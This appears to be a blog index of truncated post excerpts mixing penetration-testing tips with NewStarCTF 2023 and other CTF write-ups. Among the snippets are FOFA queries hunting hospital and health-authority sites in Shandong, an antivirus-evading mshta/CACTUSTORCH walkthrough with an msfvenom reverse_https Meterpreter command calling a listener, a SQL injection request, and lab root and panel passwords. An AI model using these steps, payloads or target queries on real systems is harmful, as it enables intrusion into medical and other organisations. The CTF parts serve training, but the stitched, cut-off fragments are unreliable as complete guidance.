Some tips from real-world engagements
fofa
country="CN"&&(title="医疗"||title="医院")&&city="山东" title="目标名称" && region="shandong" city="jinan" (title="医院" || title="医疗" || title="卫生健康"|| title="卫健委" || body="医疗")&& region="山东省" cert="目标域名或者证书关键字" && region="xx省" cert="医疗" && city="济南市"...
NewStarCTF 2023 Public Track WEEK3
web
Include 🍐
Classic file inclusion, used to write a shell and get RCE.
<?php
    error_reporting(0);
    if(isset($_GET['file'])) {
        $file = $_GET['file'];
        if(preg_match('/flag|log|session|filter|input|data/i', $file)) {
            die('hacker!');
        }
        include($file.".php");
        # Something in phpinfo.php!
    }
    else {
        highlight_file(__FILE__);
        ...
SQL Server: getting a CS or MSF session
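When you have access to a SQL Server but with very low privileges, a WAF is in place, and commands can only be executed through the web, and you want a session on MSF or CS. First, check the antivirus software: there is a lot of it, including foreign products. Here mshta is used to get an AV-evading session; reference article: https://www.zhihuifly.com/t/topic/2534 First, get the template file https://raw.githubusercontent.com/mdsecactivebreach/CACTUSTORCH/master/CACTUSTORCH.hta, in this one, then use CS or MSF to generate a raw file: msfvenom -a x86 -p windows/meterpreter/reverse_https LHOST=10.211.55.2 LPORT=3333 -f raw -o payload.bin In CS, use Attacks; note that this has to be 32-bit. Then run cat payload.bin | base64 -w 0 and write the output into the template. Then just start a Python server; for MSF, a listener has to be started: use exploit/multi/handler payload...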
cfs
root password: teamssix.com
IP addresses of this host: 192.168.1.11, 192.168.22.11
BaoTa panel login address and password: address: http://192.168.1.11:8888/a768f109/ account: eaj3yhsl password: 41bb8fee
root password: teamssix.com
IP addresses of this host: 192.168.22.22, 192.168.33.22
BaoTa panel login address and password: address: http://192.168.22.22:8888/2cc52ec0/ account: xdynr37d password: 123qwe..
GET /index.php?r=vul&keyword=1' union%20select%20database(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39--%20123 http://192.168.22.129/index.php?r=vul&keyword=1' union...
NewStarCTF 2023 Public Track WEEK2
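NewStarCTF 2023 Public Track WEEK2
REVERSE
WEEK2|REVERSE PZthon
Download the file; it looks like a py file. A py file can't simply be dragged into IDA; as for why not, I don't know either, that's what the experts say. Dragging it into IDA doesn't work either, there is too much in there. https://github.com/extremecoders-re/pyinstxtractor This Python exe decompilation tool can be used to decompile it: python3 .\pyinstxtractor.py...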
A certain group's CTF
Archive Master
A very simple nested-archive challenge; the password is the archive's password. Python script for Windows, but extraction is very slow.
import zipfile
import os
import py7zr
import rarfile
#a = py7zr.SevenZipFile(r'e:\test.7z','r')
count=0
# now =...
NewStarCTF 2023 Public Track WEEK1
NewStarCTF 2023 Public Track WEEK1
web
WEEK1|WEB Leaked Secrets
http://cd98ca4d-7c72-4499-9cb1-010764aa19de.node4.buuoj.cn:81/robots.txt http://cd98ca4d-7c72-4499-9cb1-010764aa19de.node4.buuoj.cn:81/www.zip
PART ONE: flag{r0bots_1s_s0_us3ful
$PART_TWO = "_4nd_www.zip_1s_s0_d4ng3rous}";
WEEK1|WEB Begin of Upload
Blocked on the front end
WEEK1|WEB Begin of HTTP
http://node4.buuoj.cn:29356/?ctf=1
base64_decode(bjN3c3Q0ckNURjIwMjNnMDAwMDBk
Modify the cookie
WEEK1|WEB...
Small Python auto-click script
import os
import time
import pyautogui as pag
try:
    while True:
        print("Press Ctrl-C to end")
        screenWidth, screenHeight = pag.size()  # get the screen size
        print(screenWidth,screenHeight)
        x,y = pag.position()  # get the current mouse position
        posStr = "Position:" + str(x).rjust(4)+','+str(y).rjust(4)
        print(posStr)
        time.sleep(0.2)
        os.system('cls')  # clear the screen
except KeyboardInterrupt: ...
2023longjianbeiwp
That's all
tcp.flags.syn==1 and tcp.flags.ack==1
from Crypto.Cipher import AES
import zlib
key = b'748007e861908c03'
hex_string = 'b5c1fadbb7e28da08572486d8e6933a84c5144463f178b352c5bda71cff4e8ffe919f0f115a528ebfc4a79b03aea0e31cb22d460ada998c7657d4d0f1be71ffa'
byte_data = bytes.fromhex(hex_string)
cipher = AES.new(key, AES.MODE_ECB)
decrypted_data = cipher.decrypt(byte_data)
s = zlib.decompress(decrypted_data,16 + zlib.MAX_WBITS)
sa=...